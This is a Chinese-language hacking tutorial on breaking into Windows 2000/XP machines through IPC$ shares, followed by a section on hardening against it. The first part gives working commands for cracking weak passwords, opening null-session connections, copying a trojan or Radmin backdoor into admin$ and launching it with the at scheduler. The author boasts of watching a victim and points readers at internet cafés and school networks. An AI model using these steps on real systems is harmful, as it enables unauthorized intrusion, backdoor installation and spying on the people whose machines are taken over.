ipc$共享入侵详细教程
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
ipc$共享入侵详细教程
ipc$共享入侵
微软在win2000,xp中设置的这个功能对个人用户来说几乎毫无用处。
反而成了黑客入侵nt架构操作系统的一条便利通道。
如果你的操作系统存在不安全的口令,那就更可怕了。
一条典型的入侵流程如下:
(1)用任何办法得到一个帐户与口令(猜测,破解),网上流传有一个叫做smbcrack的软件就是利用ipc$来破解帐户口令的。
如果你的密码位数不高,又很简单,是很容易被破解的。
根据我的个人经验,相当多的人都将administrator的口令设为123,2003,或者干脆不设密码。
(2)使用命令net use \\123.1.1.1\ipc$“密码”/user:“用户名”建立一个有一定权限的ipc$连接。
用copy trojan.exe \\xxx.xxx.xxx.xxx\admin$ 将木马程序的服务器端复制到系统目录下。
(3)用net time \\xxx.xxx.xxx.xxx 命令查看对方操作系统的时间,然后用at \\202.xxx.xxx.xxx 12:00 trojan.exe 让trojan.exe在指定时间运行。
这样一来,你的电脑就完全被黑客控制了。
应对措施:禁用server服务, Task Scheduler服务,去掉网络文件和打印机共享前的对勾(插入图1),
当然,给自己的帐户加上强壮的口令才是最关键的。
而且在一般情况下,一些功能对管理员来说也是没有必要的。
如果你不需要MS SQL Server 的xp_cmdshell(use sp_dropextendedproc "xp_cmdshell"这项功能就不要把xp_cmdshell extended stored proc(扩展存储过程)命令功能留着。
我们只需要在isql窗口中输入:
use master
sp_dropextendedproc 'xp_cmdshell'
net use 映射盘符: \\肉鸡IP\肉鸡盘符
譬如:
net use z: \\1.1.1.1\c (把对方的c盘映射成你的z盘),
察看一下开了哪些端口,有445哦,
(主要是针对2000系统的)
netstat -an
命令:net view
(有的机器用的是win98的系统查不出的)
看一下自己的IP
再看看用户:
于是可以进行IPC$连接了(关于IPC$空连接的资料你可以上网搜索一下)
命令:net use \\220.160.199.38\ipc$ "" /user:Administrator
命令:net use \\ip\ipc$ 密码/user:用户
net use \\220.160.199.38\ipc$ "" /user:"zyz"
显示命令成功
可以用这个命令看下是否成功:net use
好了,现在我们给他传个咚咚--我配置好的radmin
命令:copy 本地文件远程目录
如:copy c:\4899.exe \\192.168.0.200\admin$
(这里的$是指admin用户的c:\winnt\system32\)
传过去了,我们当然要运行它啊,怎么运行呢?接着看
现在我们来看看他机器的时间
命令:net time \\192.168.0.200
然后用这个命令启动
at \\192.168.0.200 时间要运行的文件
at \\IP 时间要运行的文件
(这个是计划任务里边的一个命令)
好了,然后呢,嘿嘿----等!
看下我们的后门运行了没有?
呵呵,上线了
我回头看看是哪个MM or GG?
我们看看她在干什么?
嘿嘿~OK了吧!至于以后你要做什么,就看你了
这个方法还可以入侵网吧的主机,其实内网一般都有这个漏洞
特别象学校或网吧等地方
我试过了,不过,现在偶不搞他
好了,到这里了,防范方法在下边,88!
防范ipc$入侵:
1.禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》) 首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LS A]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2.禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\L anmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\L anmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3.永久关闭ipc$和默认共享依赖的服务:lanmanserver即server 服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4.安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5.设置复杂管理员密码,防止通过ipc$穷举密码。